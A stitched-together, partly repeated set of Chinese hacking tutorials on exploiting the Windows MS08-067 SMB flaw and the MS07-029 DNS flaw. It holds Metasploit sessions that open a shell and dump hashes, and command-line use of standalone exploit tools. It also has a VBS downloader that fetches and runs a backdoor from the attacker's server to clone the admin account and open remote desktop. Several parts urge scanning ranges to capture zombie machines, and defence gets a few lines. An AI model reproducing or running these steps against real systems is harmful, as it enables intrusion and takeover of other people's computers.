下载文档原格式
MS08_067smb漏洞利⽤渗透测试
⽬标服务器:Windows XP 英⽂版
渗透测试机:KaLi
前⾔:
MS08-067漏洞将会影响除Windows Server 2008 Core以外的所有Windows系统,包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚⾄还包括测试阶段的Windows 7Pro-Beta.
本次实验⽬标服务器系统
1、查看⽬标和本地IP,如果实战的话,我们需要扫描噢,这⾥我们就直接利⽤了。
2、启动MSFConsole,搜索并使⽤MS06_067模块
3、配置相应参数,并运⾏,配置⽬标靶机地址,然后exploit或者run
4、使⽤hashdump获取xp的⽤户hash值,然后在使⽤kali⾃带⼯具ophcrack进⾏密码破解
使⽤ophcrack⼯具进⾏破解,破解出密码为123456
5、在刚才的meterpreter中开启⽬标的远程桌⾯服务
6、对⽬标进⾏远程桌⾯连接
7、渗透测试结束
读书和健⾝总有⼀个在路上。
一个比较完整的metasploit基础资料。
本文包括使用Metasploit端口扫描,操作系统探测,漏洞检测,漏洞利用,开启后门的介绍参考资料:BackTrack 4 Assuring Security by Penetration Testing关于Metasploit的介绍我就不多说了,用百度搜索一下有很多示范的漏洞是MS08-067,是一个比较老的漏洞了,系统也很老——Windows 2000 AdvancedSever。
本文主要目的是为了介绍Metasploit的使用,MS08-067是一个比较容易成功的实例,所以就选择这个了。
###################实验环境介绍####################被攻击主机:OS:Windows 2000 AdvancedServerIP:192.168.200.140攻击者主机:OS:BT5 R1IP:192.168.200.148##################入侵前的准备工作:端口扫描、漏洞检测##################因需要用到db_nmap命令,查看当前的数据库连接状态msf > db_statuspostgresql connected to msf3可以,看到当前已经连接到数据库postgresqlmsf > db_nmap -sS -sV -O --script=smb-check-vulns.nse -n 192.168.200.140Nmap: Starting Nmap 5.51SVN ( ) at 2011-12-27 01:06 ESTNmap: Nmap scan report for 192.168.200.140Nmap: Host is up (0.0023s latency).Nmap: Not shown: 970 closed portsNmap: PORT STA TE SERVICE VERSIONNmap: 25/tcp open smtp Microsoft ESMTP 5.0.2195.6713Nmap: 42/tcp open wins Microsoft Windows WinsNmap: 53/tcp open domain Microsoft DNSNmap: 80/tcp open http Microsoft IIS httpd 5.0Nmap: 88/tcp open kerberos-sec Microsoft Windows kerberos-secNmap: 119/tcp open nntp Microsoft NNTP Service 5.0.2195.6702 (posting ok) Nmap: 135/tcp open msrpc Microsoft Windows RPCNmap: 139/tcp open netbios-ssnNmap: 389/tcp open ldapNmap: 443/tcp open https?Nmap: 445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-dsNmap: 464/tcp open kpasswd5?Nmap: 563/tcp open snews?Nmap: 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0Nmap: 636/tcp open tcpwrappedNmap: 1026/tcp open msrpc Microsoft Windows RPCNmap: 1029/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0Nmap: 1036/tcp open mstask Microsoft mstask (task server -c:winntsystem32Mstask.exe)Nmap: 1042/tcp open msrpc Microsoft Windows RPCNmap: 1044/tcp open mstask Microsoft mstask (task server - c:winntsystem32Mstask.exe)Nmap: 1045/tcp open msrpc Microsoft Windows RPCNmap: 1051/tcp open msrpc Microsoft Windows RPCNmap: 1054/tcp open msrpc Microsoft Windows RPCNmap: 1061/tcp open mstask Microsoft mstask (task server - c:winntsystem32Mstask.exe)Nmap: 1062/tcp open mstask Microsoft mstask (task server - c:winntsystem32Mstask.exe)Nmap: 1122/tcp open msrpc Microsoft Windows RPCNmap: 3268/tcp open ldapNmap: 3269/tcp open tcpwrappedNmap: 3372/tcp open msdtc Microsoft Distributed Transaction Coordinator (error) Nmap: 3389/tcp open microsoft-rdp Microsoft Terminal ServiceNmap: MAC Address: 00:0C:29:EA:2C:5D (VMware)Nmap: Device type: general purposeNmap: Running: Microsoft Windows 2000|XP|MeNmap: OS details: Microsoft Windows 2000 SP0/SP2/SP4 or Windows XP SP0/SP1, Microsoft Windows 2000 SP1, Microsoft Windows 2000 SP2, Microsoft Windows Millennium Edition (Me) Nmap: Network Distance: 1 hopNmap: Service Info: Host: ; OS: WindowsNmap: Host script results:Nmap: | smb-check-vulns:Nmap: | MS08-067: VULNERABLENmap: | Conficker: Likely CLEANNmap: | regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)Nmap: | SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)Nmap: | MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)Nmap: |_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)Nmap: OS and Service detection performed. Please report any incorrect results at /submit/ .Nmap: Nmap done: 1 IP address (1 host up) scanned in 52.73 seconds使用db_nmap命令,可以看到192.168.200.140的操作系统和可能存在的漏洞,其中包括此次实验的MS08-067.#########################开始入侵###########################查询并查看有关MS08_067的漏洞信息msf > search ms08_067Matching Modules================Name Disclosure Date Rank Description—- ——————- ———–exploit/windows/smb/ms08_067_netapi 2008-10-28 great Microsoft Server Service Relative Path Stack Corruptionmsf > use exploit/windows/smb/ms08_067_netapimsf exploit(ms08_067_netapi) > infoName: Microsoft Server Service Relative Path Stack CorruptionModule: exploit/windows/smb/ms08_067_netapiVersion: 12540Platform: WindowsPrivileged: YesLicense: Metasploit Framework License (BSD)Rank: GreatProvided by:hdm/cgi-bin/cvename.cgi?name=2008-4250/49243/technet/security/bulletin/MS08-067.mspxNEXPOSE (dcerpc-ms-netapi-netpathcanonicalize-dos)msf exploit(ms08_067_netapi) >查看攻击目标主机的需要配置的选项msf exploit(ms08_067_netapi) > show optionsModule options (exploit/windows/smb/ms08_067_netapi):Name Current Setting Required Description—- ———————–———–RHOST 192.168.200.140 yes The target addressRPORT 445 yes Set the SMB service portSMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)Payload options (windows/shell_bind_tcp):Name Current Setting Required Description—- ———————–———–EXITFUNC thread yes Exit technique: seh, thread, process, noneLPORT 4444 yes The listen portRHOST 192.168.200.140 no The target addressExploit target:Id Name——-0 Automatic Targeting################使用Bind Shell方式#######################设置相关参数msf exploit(ms08_067_netapi) > set RHOST 192.168.200.140RHOST => 192.168.200.140设置payloadmsf exploit(ms08_067_netapi) > set payload windows/shell_bind_tcppayload => windows/shell_bind_tcp查看你设置参数的情况msf exploit(ms08_067_netapi) > show optionsModule options (exploit/windows/smb/ms08_067_netapi):Name Current Setting Required Description—- ———————–———–RHOST 192.168.200.140 yes The target addressRPORT 445 yes Set the SMB service portSMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)Payload options (windows/shell_bind_tcp):Name Current Setting Required Description—- ———————–———–EXITFUNC thread yes Exit technique: seh, thread, process, noneLPORT 4444 yes The listen portRHOST 192.168.200.140 no The target addressExploit target:Id Name——-0 Automatic Targeting现在开始溢出攻击msf exploit(ms08_067_netapi) > exploit•Started bind handler•Automatically detecting the target…•Fingerprint: Windows 2000 – Service Pack 0 – 4 – lang:English•Selected Target: Windows 2000 Universal•Attempting to trigger the vulnerability…•Command shell session 2 opened (192.168.200.148:34431 -> 192.168.200.140:4444) at 2011-12-27 01:14:59 -0500Microsoft Windows 2000 [V ersion 5.00.2195](C) Copyright 1985-2000 Microsoft Corp.C:WINNTsystem32>成功获得shell!哈哈!!!###########################使用Reverse Shell方式#####################大家知道如果攻击者与被攻击之间有防火墙的话,防火墙会检测TCP连接状态,正向连接可能不会成功。
利用MS08067远程溢出漏洞抓肉鸡说明:(1)由于扫描出来的结果比较少,所以直接看就可以了。
如果结果比较多,可以到sfind扫描目录下直接打开sfind.txt 扫描结果。
注意:(1)在溢出过程还有多种提示例如“Make SMB Connection error:64”(2)出现“Maybe Patched!”提示的计算机也可能溢出成功。
(3)仅仅对台湾和简体中文版本有效,对其他版本的服务器及时存在445漏洞也无法溢出,原因是操作系统溢出点内存地址不同。
3.监听“4444”端口在执行扫描的计算机上使用nc监听4444端口,具体命令为“nc –vv ip地址4444”,例如“nc –vv 218.69.*.2 4444”,一次不成功的溢出显示结果为“nc -vv 218.22.27.71 4444Warning: forward host lookup failed for : h_errno 11002:TRY_ [218.22.27.71] 4444 (?): TIMEDOUT sent 0, rcvd 0: NOTSOCK”,这说明218.22.27.71可能已经安装补丁、防火墙禁止对外进行连接等情况,导致溢出不成功。
说明:在MS08067中可以定制监听端口,不过那个端口需要在源程序中定制。
4.继续进行溢出将以上脚本在反弹的shell中直接粘贴即可从Ftp服务器上下载,然后可以在反弹的Shell中执行下载的文件。
在本次渗透过程中,由于是相邻IP,因此使用了一个简便的方法,即单击“开始”-“运行”,在其中输入“\\IP\admin$”或者“\\IP\C$”并确定,如图6所示,如图能够连接,则会出现一个输入网络密码的提示框,在用户和密码中分别输入刚才添加的用户名。
8.获取系统详细信息以及执行各种命令使用MS08067溢出工具成功溢出服务器后,还可以使用“telnet IP地址4444”连接被溢出服务器,如图8所示,偶使用telnet进行了尝试,获取系统信息并开放了3389端口。
前言:MS07-029,Windows 域名系统(DNS) 服务器服务的远程过程调用(RPC) 管理接口中存在基于堆栈的缓冲区溢出。
漏洞的前提是没打补丁,开启DNS服务的所有版本WINDOWS 2000 Server和WINDOWS 2003 Server。
今天,就让我带领各路英豪,踏上DNS EXP之路。
我们先来看看所用工具的界面:这就是传说中的利用工具,可以通杀2000SEVER,2003SEVER系统,另外还具备了扫描功能!先用它来对主机进行扫描:在我们的命令行下输入:“dns –s 目标IP地址”稍等片刻,开放的端口以及操作系统以出现在我们面前,如果出现了如上图所显示的“1029:Vulnerability”那么恭喜你,你马上就会成功得到这台主机的权限了上图意思就是1029端口存在漏洞。
现在我们来最关键的步骤――溢出:在命令行内输入dns -2003chs *.*.93.189 1029其中-2003ch的意思是操作系统的型号,-2003chs即简体中文版的2003系统,如果是2000的系统就使用“-2000all”参数,*.*.93.189就是我们的目标IP地址,10 29就是刚才扫描出存在漏洞的端口”。
出现“Attack sent ,check port 1100”字样,说明已经打开了目标地址的1100端口,我们TELNET上去:TELNET *.*.93.189 1100我们现在已经成功的入侵了对方的电脑,并且得到了管理员的权限。
下面我给大家介绍一下如何在肉鸡上面开3389,在命令行里输入@echo with wscript:if .arguments.count^ tony.vbs@echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >> tony.vbs@echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then .echo "Error:"+web.status:.quit >> tony.vbs@echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >> tony.vbs大概的意思就是在命令行创立一个用来下载的VBS脚本tony.vbs然后把开3389的工具上传到你的个人空间,我这里用的是火狐开3389的工具,在命令行里输入cscript tony.vbs http://你空间地址/wrsky.exe c:wrsky.exe“wrsky.exe -c”可以克隆当前管理员帐号再输入“c:wrsky.exe -o 3551”意思就是打开对方的远程桌面服务,并且使用3551端口。
前言目前国内书店关于脚本方面的书籍特别多,但这些书相对来讲理论性的知识偏多。
更重要的这些书中介绍的例子,在安全性上都是漏洞百出,这样导致新学脚本的朋友写出来的程序同样是漏洞百出,典型的恶性循环。
而当前主要讲述脚本程序漏洞的方面书籍却没有,所以《黑客手册》决定联合我出版《精通脚本黑客》一书。
《精通脚本黑客》是一本集合了脚本环境和黑客知识的网络安全基础教程,一个大的脚本环境下,介绍了网站入侵、各种常见脚本语言的基础学习、脚本程序漏洞分析与利用等内容。
网站入侵方面是为没有多少入侵经验或对脚本环境下的入侵技术没有了解的朋友而准备;而各种常见脚本语言的基础学习是为没有脚本语言基础但已有一定入侵经验的朋友而准备;等有了前面的基础后就介绍如何在脚本程序中寻找各种漏洞并加以利用。
本书的目的是用通俗的语言来讲述脚本环境下的各种安全问题,期间没有复杂的理论。
以下是本书的主题内容以及结构层次:1、熟悉ASP、PHP、JSP网站的搭建。
告诉你网站是如何被架构的,进而为后面分析脚本程序漏洞时,测试漏洞所用。
2、常见的各种脚本攻击技术。
全面、细致的介绍脚本环境下的各种黑客技术,如coookie 欺骗、注入、跨站、文件包含、获取webshell及提权等等。
让你可以轻松的入侵并控制一个网站服务器。
3、让你轻松入门学习HTML、Javascript、VBscript等客户端脚本语言,从而在本质上认识挂马、跨站等黑客技术,同时还有一些常见的脚本病毒的编写。
4、数据库学习。
先介绍SQL语言的基础学习,为后面分析程序漏洞打下坚实的基础。
同时介绍SQL Server、MySQL等数据库下的高级黑客技术。
5、ASP下的黑客技术。
先给大家讲解ASP基础,让大家能够看懂ASP程序。
之后,就介绍ASP程序中常见的漏洞,教大家如何分析ASP程序中的漏洞,如注入、跨站等等,同时还介绍一些ASP木马编写技术。
最后,还用两个分析完整程序漏洞的例子作为实践,增加一些实战经验。
黑客MS08-067漏洞攻击全程演示(图解)MS08-067漏洞是Server 服务中的漏洞,该漏洞可能允许远程代码执行。
下面我们来进行MS08-067漏洞远程溢出演示,让我们看看我们的机子是如何轻易的成为人家的肉鸡,被控制的1.漏洞主机扫描。
使用专业端口扫描工具扫描445端口。
获取可溢出的主机列表。
如下图:2.MS08-067溢出工具进行主机溢出,格式ms08-067.exe ip 溢出成功标志:SMB Connect OK!Send Payload Over!3.溢出成功后会开放4444端口,直接telnet登陆上去。
4.Ipconfig确认溢出成功。
5.添加用户确认获取系统权限6.防范办法:针对该溢出,我们并不是没有办法,既然是要扫描445端口,然后telnet,我们只需如下的方法就可以解决:一、及时安装KB958644补丁二、关闭或屏蔽掉445端口。
三、安装专业防火墙。
《MS08-067》溢出:扫445端口, 溢出Q:提示SMB Connect OK!RpcExceptionCode() = 1722这样溢出成功了么?A:溢出失败,对方开启了防火墙。
Q:提示Make SMB Connection error:1203是怎么回事?A:对方没有开机联网或者没有安装Microsoft 网络的文件和打印机共享协议或没有启动Server服务。
Q:提示SMB Connect OK!Maybe Patched!补丁已经打上了。
不存在漏洞。
SMB Connect OKMaybe Patched!这个说明对方已经打了补丁SMB Connect OK!Send Payload Over!溢出成功----------------------------------------------------在cmd下直接运行MS08-067.exe 出现命令帮助MS08-067.exe <Server>很简单,只需要输入MS08-067.exe IP 就可以了。
黑客MS08-067漏洞攻击全程演示(图解)MS08-067漏洞是Server 服务中的漏洞,该漏洞可能允许远程代码执行。
下面我们来进行MS08-067漏洞远程溢出演示,让我们看看我们的机子是如何轻易的成为人家的肉鸡,被控制的1.漏洞主机扫描。
使用专业端口扫描工具扫描445端口。
获取可溢出的主机列表。
如下图:2.MS08-067溢出工具进行主机溢出,格式ms08-067.exe ip 溢出成功标志:SMB Connect OK!Send Payload Over!3.溢出成功后会开放4444端口,直接telnet登陆上去。
4.Ipconfig确认溢出成功。
5.添加用户确认获取系统权限6.防范办法:针对该溢出,我们并不是没有办法,既然是要扫描445端口,然后telnet,我们只需如下的方法就可以解决:一、及时安装KB958644补丁二、关闭或屏蔽掉445端口。
三、安装专业防火墙。
《MS08-067》溢出:扫445端口, 溢出Q:提示SMB Connect OK!RpcExceptionCode() = 1722这样溢出成功了么?A:溢出失败,对方开启了防火墙。
Q:提示Make SMB Connection error:1203是怎么回事?A:对方没有开机联网或者没有安装Microsoft 网络的文件和打印机共享协议或没有启动Server服务。
Q:提示SMB Connect OK!Maybe Patched!补丁已经打上了。
不存在漏洞。
SMB Connect OKMaybe Patched!这个说明对方已经打了补丁SMB Connect OK!Send Payload Over!溢出成功----------------------------------------------------在cmd下直接运行MS08-067.exe 出现命令帮助MS08-067.exe <Server>很简单,只需要输入MS08-067.exe IP 就可以了。
MS08-067 Exploit for CN by[ft=#ff0000,,目标机为虚拟机(IP 192.168.1.2),攻击者为本机(IP 192.168.1.188)虚拟机端口开放如下:输入命令:MS08-067.exe 192.168.1.2提示:SMB Connect OK!Send Payload Over!再次查看虚拟机的端口:我们看到当我们运行了MS08-067.exe 192.168.1.2 之后,虚拟机的端口出现了个4444 端口,状态为LISTENING ,这时就说明已经溢出成功了,接下来我们在本机运行Telnet 192.168.1.2 4444就可以了Telnet登陆到目标机了。
2008年10月29日[新洞试练]Ms08-067 Exp 详细测试流程(图文)[新洞试练]Ms08-067 Exp 详细测试流程(图文)Writed By 樱木花盗Blog:Admin@为了测试这个,我装了三个虚拟机。
一两个XP一个2003,终于弄明白都需要哪些必要条件了,写出来和大家分享,希望对离成功还差一步的同学们有所帮助,感谢幻影的牛人放出MS08-067的Exp,自由,共享。
下载:MS08-067.rar经过N+1次的测试之后发现,本机和目标机必须要开启以下服务,否则就算对方没有打补丁也会失败。
Server、Computer Browser、Workstation。
下面测试开始(和我局域网的同学们的电脑我都会第一时间叫他们打补丁。
这次没法儿用他们的电脑测试了,我只好装虚拟机测试)在cmd下直接运行MS08-067.exe 出现命令帮助MS08-067.exe <Server>很简单,只需要输入MS08-067.exe IP 就可以了。
MS08-067 Exploit for CN by EMM@目标机为虚拟机(IP 192.168.1.2),攻击者为本机(IP 192.168.1.188)虚拟机端口开放如下:输入命令:MS08-067.exe 192.168.1.2提示:SMB Connect OK!Send Payload Over!再次查看虚拟机的端口:我们看到当我们运行了MS08-067.exe 192.168.1.2 之后,虚拟机的端口出现了个4444 端口,状态为LISTENING ,这时就说明已经溢出成功了,接下来我们在本机运行Telnet 192.168.1.2 4444就可以了Telnet登陆到目标机了。
执行个命令加个帐户看看,成功了~测试到此结束,以下关于此次测试大家可能遇到的几个问题我在这里集中回答下。
Q:我的服务里没有Server 这个服务怎么办?A:在本地连接-属性里点安装-服务-添加-Microsoft 网络的文件和打印机共享,点确定,会提示是否重启,其实不用重启就可以,在服务里按F5刷新一下就有这个服务了。
Q:提示SMB Connect OK!RpcExceptionCode() = 1722这样溢出成功了么?A:溢出失败,对方开启了防火墙。
Q:提示Make SMB Connection error:1203是怎么回事?A:对方没有开机联网或者没有安装Microsoft 网络的文件和打印机共享协议或没有启动Server服务。
Q:提示SMB Connect OK!Maybe Patched!是怎么回事?A:目标已经打上了这个补丁。
工具名称发布日期点击数攻击入侵Jim MS08-067漏洞利用工具2008-12-16 799利用远程溢出漏洞进行攻击是一种非常有效而且威力巨大的黑客攻击手段,不过远程溢出漏洞有很强的时效性,必须要抓紧时间利用这个漏洞还未被普遍补上的时机进行攻击,一旦过了这段时间,漏洞补上之后就很难再重现远程溢出攻击了。
微软Windows系统已经有一年多没有爆出远程溢出漏洞了,微软爆出四年以来最严重的特大安全漏洞——MS08-067远程溢出漏洞,几乎影响所有Windows系统,并且很快成为黑客攻击和木马传播利用的手段,受此漏洞危害的用户系统将会非常之多!让我们快借此机会玩玩远程溢出吧!学过远程溢出的赶紧进行实践,抓肉鸡一抓就得!一、MS08-067远程溢出漏洞简介曾经的冲击波、震荡波等大规模攻击都是由于Windows的RPC服务漏洞造成的,MS08-067远程溢出漏洞也不例外。
MS08-067远程溢出漏洞的原因是由于Windows系统中RPC存在缺陷造成的,Windows系统的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞,远程攻击者可以通过发送恶意的RPC请求触发这个溢出,如果受影响的系统收到了特制伪造的RPC请求,可能允许远程执行代码,导致完全入侵用户系统,以SYSTEM 权限执行任意指令并获取数据,并获取对该系统的控制权,造成系统失窃及系统崩溃等严重问题。
受MS08-067远程溢出漏洞影响的系统非常多,受影响的操作系统有Windows XP /2000/Vista/2003等。
除Windows Server 2008 Core外,基本上所有的Windows系统都会遭受此漏洞的攻击,特别是在Windows 2000、Windows XP和Windows Server 2003系统,攻击者可以利用此漏洞无需通过认证运行任意代码。
这个漏洞还可能被蠕虫利用,此安全漏洞可以通过恶意构造的网络包直接发起攻击,并且攻击者可以获取完整权限,因此该漏洞很可能会被用于制作蠕虫以进行大规模的攻击。
二、漏洞主机扫描在利用MS08-067远程溢出漏洞进行攻击前,首先要找到要攻击的主机目标。
由于启用了RPC服务的Windows系统往往会开放445端口,因此攻击者只要使用专业端口扫描工具扫描445端口,即可获取可溢出的主机列表。
这里使用的是老牌扫描工具——图标是一个瑞士军刀的X-Scan。
1.扫描设置步骤1:运行X-Scan后,首先需要设置扫描的目标IP地址段。
点击工具栏上的“扫描参数”按钮,选择“检测范围”选项,在“指定IP范围”里可以输入一个固定的IP地址或IP地址段。
步骤2:切换到“全局设置”→“扫描模块”选项,设置扫描模块为“开放服务”。
步骤3:在“插件设置”→“端口相关设置”中,将待检测的端口改为“445”。
步骤4:在“全局设置”→“其它设置”中,将扫描类型设置为“无条件扫描”。
步骤5:最后在“全局设置”→“扫描报告”中勾选“扫描完成后自动生成并显示报告”项,设置完毕后点击确定按钮,关闭对话框。
步骤6:点击工具栏上的“开始扫描”按钮,X-scan就开始工作了。
确定后,即可开始进行扫描。
扫描结束后,会自动弹出一个扫描结果窗口查看到扫描结果。
如果发现开放了445端口的主机,那么这些主机只要未及时打上补丁,都很可能遭受攻击成为入侵者的肉鸡!三、MS08-067溢出工具溢出攻击现在我们可以一个一个的尝试溢出攻击扫描出来的目标了。
首先,下载溢出攻击工具“MS08-067远程溢出漏洞利用工具”,并将其解压于C盘根目录下。
点击“开始”菜单→“运行”,输入命令“CMD”,回车后打开命令提示符窗口。
进入溢出工具所有的文件夹“Release”目录下,执行命令“MS08-067.exe”,可看到溢出工具命令使用格式为: MS08-067.exe <Server>,将其中的Server换为自己要攻击的远程主机就可以了。
1.建立空连接在攻击前,首先要与目标主机建立一个空连接,这里假设我们要攻击的目标主机为“192.168.1.8”,可执行如下命令:net use \192.168.1.9ipc$命令执行后,即可与远程主机建立一个空连接。
提示:这一步不是必须的,如果有的主机无法溢出成功,可以先进行空连接。
而有的主机则不必建立空连接,即可进行溢出。
2.执行远程溢出建立空连接后,即可进行溢出攻击了。
攻击命令如下:MS08-067.exe 192.168.1.9执行攻击命令后,溢出程序就会自动与远程主机建立SMB连接,并进行溢出攻击。
3.溢出返回结果溢出攻击后,往往会有不同的返回结果提示信息,一般有三种情况:如果返回的信息为:SMB Connect OK!Maybe Patched!那么说明远程主机上可能已经打上了该溢出漏洞补丁,虽然可以建立SMB连接,但是无法攻击成功。
如果返回信息为:Make SMB Connection error:53或者Make SMB Connection error:1219,后面的数字可能是变化的。
那么说明该主机没有开机连网或者没有安装 Microsoft 网络的文件和打印机共享协议或没有启动Server服务,因此无法进行溢出。
